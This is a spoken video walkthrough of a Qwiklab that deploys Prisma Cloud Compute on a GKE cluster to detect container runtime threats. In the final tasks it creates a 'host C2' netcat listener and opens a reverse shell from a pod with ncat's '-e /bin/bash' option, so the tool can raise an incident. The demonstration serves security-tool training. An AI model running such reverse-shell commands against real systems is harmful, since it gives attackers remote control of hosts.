Good day everyone. Today we will go through GKE and Prisma Cloud Qwiklab. Let's see here in the search bar what our options are. So let's search for first format lab, then Prisma, okay, out of these 5 currently available, we will go through the first one, Prisma Cloud Securing GKE Runtime. As I'm currently using my partner account, this Qwiklab currently shows as free. Please bookmark this URL, which contains information and links through which you can get free credits or a free month pass. For example, on Qwiklabs blog, we can see posts, and for example, the latest one, best practices using Terraform. Okay, it does not contain promo code, but mentions arcade. And if you go there, you will find additional info. Okay, let's now switch back to our lab and start it. We will open Google Console in a new private window. So we won't use our personal accounts, but this disposable one, lasting only for the lab duration. Okay, great. We are landed in the console. Accept terms of service, agree and continue. Let's go through the introductory part. Overview. In this lab, you will use Prisma Cloud Compute to secure runtime aspects of a Google Kubernetes Engine GKE cluster. What you'll do: set up a GKE cluster, deploy service on the GKE cluster, deploy Prisma Cloud Compute console on the GKE cluster, configure security policies in Prisma Cloud Compute, go through a real-world use case. Okay, we'll skip this setup and the requirements part. It's the same for all Qwiklabs. We are familiar with that part. And let's proceed with task 1. Connect to the Kubernetes cluster. Navigations menu, Kubernetes engine clusters. You may have to wait for your Kubernetes cluster. You should see a green check mark next to the cluster named Kate-cluster. Okay, great. We see the green check mark. Okay, let's close this tutorial part to have more room to work with here in the console. Click on the 3 dots, then click Connect. Click Run in Cloud Shell. Connect to the cluster. Okay, and this will take a few moments as this is a persistent image container giving full shell access to your project. It comes with a number of useful tools pre-installed, such as Terraform. In production environment, the best reason to use Cloud Shell rather than your own laptop shell is that you don't have to worry about storing authentication tokens. Cloud Shell automatically inherits all permissions from your account. Press enter in the Cloud Shell to run the pre-populated gcloud command. Okay, let's do that before proceeding to task 2. So we will run this command in Cloud Shell. Press enter. Authorize. Okay, with that we finished with task 1. Let's proceed to task 2. Install Prisma Cloud Compute. From Cloud Shell, execute the following commands. Download and install the latest Prisma Cloud Compute console software image. Make a directory to decompress the file to. Decompress the file. Change directory to the Prisma Cloud Compute Edition folder and use the Linux Twist CLI to generate a YAML file for the Prisma Cloud Compute console. Retrieve the Prisma Cloud token. Okay, after executing the following command, in the next step you will be asked for the token you just retrieved. Execute the following Linux Twist CLI command to generate a YAML file for the Prisma Cloud Compute console. Paste the Prisma Cloud token into Cloud Shell. You will not see the token when you paste it into the Cloud Shell. Okay, noted. Press enter after the paste and the command will complete. Your output should resemble the following. The script is adding the token to the YAML file for initial authentication. Now use kubectl to create the console. kubectl create -f twistlock console YAML. Run the following command to check and see if the service has come up fully. The command uses a -w flag, which means wait. The flag will auto-refresh the screen. kubectl or kubectl or kubecontrol, pick your poison, get service -w-n twistlock. Okay, so namespace will be twistlock. The external IP will show once the service is available. Note the public IP under the external IP heading. This will be used to gain access to the Prisma Cloud Compute console. Okay, so something like this we expect to see, and use that similar external IP with the HTTPS protocol and port 8083. Proceed after certificate warning and create administrator account with following credentials. Okay, in Cloud Shell retrieve the Prisma Cloud license key, paste the license key in the update field and click register. Once the key has been registered, a first use menu will become available. You can step through the first run menu by selecting next or select the X in the upper right hand corner to exit out of the first use menu. Install Prisma Cloud Compute Defender daemon set. Okay, then we will install the Prisma Cloud Compute Defender daemon set. The Defender is a software module that will be installed to monitor every container. Defender communicates with the Prisma Cloud Compute console using TLS, Transport Layer Security. You will update the list of identifiers in console certificates that the defenders will use to validate the console's identity. This will change your current browser certificate and force you to log back into the Prisma Cloud Compute console. Install Prisma Cloud Compute Defender daemon set. From the Prisma Cloud Compute console, go to Manage Defenders, deploy Defender, then Orchestrator as shown with these errors. Then Client Defender should be named Twistlock console as shown. The Defender is installed as a daemon set, which ensures that an instance of Defender runs on every node in the cluster. Okay, on the same page then, in section 14, we'll turn on node uses The nodes use a container runtime interface, CRI, not Docker. In section 15, select target machine OS. We'll select Linux and use the copy button for the install script, as shown here. Copy paste the command. The Defender daemon set install script creates and deploys the Prisma Cloud Compute Defender YAML file. The script will direct the Defender to connect to Prisma Cloud Compute console using the service account the script creates. It may take a minute for the Defender YAML file to be fully deployed. In the Prisma Cloud console, navigate to the Manage Defenders Manage. To see a list of deployed defenders, you will see something similar to the following. Okay, a couple of defenders deployed in connected state, status showing as connected. Then we will navigate to the Raiders settings and enable container network monitoring and host network monitoring. Then again navigate to Raiders and select containers. You will see that the Defender has begun to scan the existing environment and populate the console with information. Okay, we expect to see something like this. Okay, this image is a bit small and blurry, but we get the point. In the next section, you will deploy additional web services. You will view all of these new Kubernetes services in the Prisma Cloud Compute console in the following section. Okay, before proceeding to task 3, let's run all of these commands from task 2. Download and install the latest Prisma Cloud Compute console software image. Directory decompress. And again switch directory, retrieve the token. Okay, let's not work at the bottom of the screen, but let's clear the workspace, and now let's paste the command. Great, we have our token showing here. Then execute the Linux twist CLI command to generate the YAML file and paste the token. Control C, okay, and let's once again run this command. Let's now Control V to paste, enter. Okay, we see the similar output as was shown in the instruction. Okay, let's proceed. Let's create console, kubectl create -f twislo console YAML. And get the service, and we expect to see external IP. Once you see the external IP, use Ctrl C to stop the wait flag and return to the command line. Okay. Okay, let's copy paste this address and port 8083. Use following administrator account credentials. Here we have to update our Prisma Cloud license. Okay, let's switch to the Cloud shell and execute this command. Okay, the license was successfully updated, looking good. Our license expires in 1 day. Okay, let's go through this first run menu. I'll skim through this part, but please pause the video if needed, or go slower or faster through a section of your interest. Now we will install Prisma Cloud Compute Defender daemon set. Okay, from the menu, let's go to Manage Defenders, Orchestrator, Qwiklabs console. Manage Defenders. Deploy Defender, Deploy Defender, Orchestrator, and here Qwiklabs console should be. Then in section 14, use CRI.NET Docker, and section 15, choose Linux, copy, paste the install script. So section 14, here, let's move the slider to on, and in section 15, target OS machine is Linux, copy this command. Okay, it says Defender daemon set installation completed. Let's proceed. It says it may take a minute for the Defender YAML file to be fully deployed. In the Prisma Cloud console, navigate to Manage Defenders Manage. To see a list of deployed defenders, you will see something similar to the following. Great. We see 3 listed defenders in status connected. Looking good so far, and with that we can navigate to the Radar's settings and enable container network monitoring and host network monitoring. Navigate to the Raiders and select containers. already in radars, then containers. Okay. So we currently see only the Qwiklabs namespace, but if we show all filters, okay, and remove the Qwiklabs, okay, now we see everything. So Cube system and Qwiklabs namespaces. Okay, and color is by vulnerabilities. We have the option to color by runtime also, and by compliance. We'll switch back to color by vulnerabilities, and as shown in the lab instruction. And proceed to task 3. Install web services. In Google Cloud Shell, download services, and note that you will change directories when you execute the following command. Let's mark everything. Git clone, switch, kubectl, create apply. Okay, this takes a few moments to deploy. Verify deployment with this command. kubectl get pods -oy -n sock shop. There should be about 13 containers. Before you continue, every service should be listed as running with an IP. Rerun the command until you see all are running. This usually takes approximately 1 to 2 minutes. Let's clear the workspace for clarity. Okay, some of them are still in creating state with no IP address. Let's wait a bit. While we are waiting, let's read through the rest of the task 3. Obtain the service frontend IP address using the command below, kubectl get service -n sock shop. Locate the external IP for the service frontend and copy the IP address. Then browse to the IP address using HTTP, not HTTPS, to load up the service. Even though all services are running, it is normal to see a 404 error while the app is still deploying. Continue to refresh the page in your browser. After approximately 1 to 2 minutes, refresh the page and you will see the following. Log in to the Sock Shop website with the credentials and browse around the site and purchase some items. Don't worry, it won't ask you for real card details. By doing this, you are generating communication traffic. This will allow Prisma Cloud Compute to learn communication paths between the containers. Go back to the Prisma Cloud console and in the Radars containers view, check Sock Shop in filter. Okay, we then expect here to see Sock Shop namespace listed. Then refresh in the lower right-hand corner additional container services will be visible, as well as the communication paths. Okay, let's go through this part hands-on. So we stopped here. Let's rerun the command. Okay, now all are showing in the running state. Great. Let's obtain the service front-end IP address. Great, we see here external IP listed. Great. So it's deployed and ready for us to use. Okay, we should log in. With mentioned credentials, user password, and browse around to generate some traffic. Okay. Okay, let's buy something formal. Oh well, we tried. Let's buy anything. Okay, let's try from here. Let's view details to generate some traffic. Okay, maybe add to wish list. Add to cart. Okay, we have now listed 1 items in cart. Let's try with Super Sport. Okay, let's try to buy this. Let's try to add some shipping address and payment methods. Something. See if okay, it won't update. Payment maybe. Nothing. Let's try to proceed to checkout. Could not place order, missing shipping or payments information. Let's maybe try to change quantity. Proceed to checkout. Okay, let's stop now with this and hope it generated enough traffic for us to proceed and finish the lab with no issues. Okay, let's check Radar's containers view and sock shop namespace. So in the Prisma Cloud UI, okay. So containers, and here, okay, now we see sock shop, but let's filter only to see sock shop namespace. Okay, and we have color by vulnerabilities. Okay, and refresh. Okay, we see with the darker colors, okay, more vulnerable containers. Type she in the search box to search a container name starting with she, like shipping. Okay, to highlight that container. Okay. So let's search for, okay, we found one match. Let's put it in focus. Click on the container shipping 048, okay, to see all the information and alerts Prisma Cloud Compute has found that are associated with the container. Let's adjust a bit our view to see more information. Okay, and let's click vulnerabilities. Click on one of the lists to expand it and list its associated CVE. So vulnerabilities and expand one. Okay, after that we will close the container details, clear the search and go back to Radar's view. Now find the container Mongo latest and observe the network connections to the container from container orders 047 and carts 048. Orders and carts. Okay, and Mongo latest. Okay. So here vulnerabilities. Okay, let's browse through these. Let's close the details window and remove the filter. Okay, now we should focus on, was it Mongo latest? Yeah, orders and cards. Communication path. Says click the link between orders and Mongo latest. And notice the traffic is using TCP port 27017. Direction is from orders to Mongo. So orders and Mongo, click the link. Okay. As said, let's proceed to task 4. Task 4, runtime security and container runtime model. Please go through this text on your own time. Let's focus on the hands-on part. Let's review the container model of a service in SOC Shop, what Prisma Cloud Compute has learned so far. In the Raiders containers, click on Mongo latest. Okay. In Raiders containers, click on Mongo latest. Okay. And explore details about service Mongo latest. Review the information under General tab. The next step, Process tab, to review all processes run by Mongo latest. Click on Networking tab to review the learned networking ports, internet connections, and domains that are used by Mongo latest. You can see there is no internet connection and the internal listening port is 27017. Then File System to review learned file system mount points. Okay, and with that, we have reviewed the container runtime model learned by Prisma Cloud Compute. After the learning period, any process, network activity, file system access, or system call beyond the contain model can be detected as anomalous behavior. You have the option to set a policy to alert, prevent, or block the anomalous behavior. So let's go through the tabs before proceeding to task 5. Task 5. Real-world use case reverse shell. Deploy an image that contains a reverse shell. In Cloud Shell, create a new file, reverse.yaml, and add the following to your file. Okay, we see here we will use this image. Okay, I already found it in Docker Hub, so we can see the image layers. Okay, save the file, verify it was created, and deploy the reverse shell container YAML file. Go back to the Prisma Cloud Compute console and select Radar container. The reverse shell container is running in the default namespace. Okay, we did not define any namespaces, so default is used. At the top of the window, filter to the default namespace. The ncat pod should show up in the radar view. Okay, then in the Google Cloud Console, from the navigation menu, navigate to the Compute Engine VM instance and click SSH into host C2. This should open a new window. Okay, let's go through the hands-on part before proceeding with host C2 commands. Okay, I will here use Nano for a change. The text editor, if it's available. Okay. So the name is reverse.yaml. Create. Okay, and then copy this to the file and verify the content is there. Get. Deploy the reverse shell container YAML file and then switch to the Prisma Cloud interface. Okay, it says the shell pod was created. Let's see here with kubectl get pods. Okay, we see it here in running state. Great. And then let's switch to Radar container in Prisma Cloud user interface. So let's refresh the view, and here let's filter default namespace. Great, it's showing. Ncat. Okay, now we can proceed to VM instances and SSH into host C2. This should open a new window. Okay, then let's read a bit this instruction. It mentions execute the following command to have the host listen to port 80. Sudo nclv80, return to the cloud shell and execute the following command to access the command shell of the reverse shell container. kubectl exec stdin tty shell pod bin bash. In the root shell pod, execute the following to establish the reverse shell connection to the host C2 ncat, replace with host C2 external IP. Okay, port 80 and -e bin bash return to the host C2 window. Okay, so we should do that part hands-on. Let's switch to the VM instances. So from Kubernetes engine view, let's switch to compute engine VM instances. Okay, let's try to refresh from here. Let's try once again. Compute engine, VM instances. Great. So here we should see this host C2 VM, but it's not there. Okay, let's create an instance quickly and see if that will do the trick. Let's name it as mentioned in the instruction. Host C2. Use the same region zone as our lab instruction mentioned. We won't change the machine configuration. Let's use the default options, but it was mentioned that host should listen on port 80. So we will here change only this part, allow HTTP traffic for port 80 and create. Let's wait a bit until we see the host C2 in running state. We'll need its external IP showing here and SSH into it. Okay, now it's up and running. Opening new browser window. Great. Okay, it says execute the following command to have the host listen to port 80. So we see here we now have sudo nc command not found. Let's troubleshoot. Okay, it's not the sudo issue, but let's see with nc. nc we don't have netcat. Okay, pre-installed. So with a fast Google search, we'll land onto similar instruction. For example, this how to install netcat command on Linux. Okay, this will do. Let's skim through the instruction. Okay, let's update first the machine. We currently have some permissions denied, but let's try with sudo. Levels of permission. Okay, that looks now better, and done. And now let's install netcat. Let's try also with sudo. Yes. NC. Okay, now we have NC. Let's just verify. Command. Okay, we don't need the rest. So let's execute the following command to have the host listen to port 80. Okay. Now return to the Cloud shell and execute the following command to access the command shell of the reverse shell container and establish the reverse shell connection to the host C2. Okay, here we have to run this command, but replace this part with host C2 external IP. So that would be this. Okay, we are here listening. Let's paste the external IP address, the host C2. Port 80 pin bash. Okay, enter. Great. We now have a connection received. Okay, let's see here. Great. And task 6, last one, let's review incidents in Prisma Cloud. Go back to the Prisma Cloud Compute console, then select Radar container. Notice how the netcat container changed to a big red sign. Click on the netcat container to view details. Then click on this image is involved in an incident to view more detail. Then click on reverse shell. Let's do a refresh here. Then click on the forensic icon to review the details. Here's what you should see. Images here are a bit blur, but we get the gist. And with that, we have now successfully deployed Palo Alto Network's Prisma Cloud Compute to gain visibility into the GKE Kubernetes cluster. Now it's time to end our lab, but before that, let's manually force here points check, progress check. So install Defender daemon set. We went through this part. We expect to see all 30 points here. Great, okay. When forced, it acknowledged the progress made. And the last one, create SOC shop namespace and deploy service. Great. And with that forced manual check, we now obtained all 100 points and can end the lab. But as we have 10 more minutes available in the lab UI, let's browse a bit through the interface. So we have here available rule default alert on suspicious runtime behavior, and we can change it. Great, this would be overview of the Prisma Cloud web interface available with this Qwiklab. For example, here there are some checks available by default. But we can add, for example, our roles. And for the latest info, check out Prisma Cloud documentation. With that, we completed this Qwiklab. I hope you enjoyed the walkthrough. Until the next one.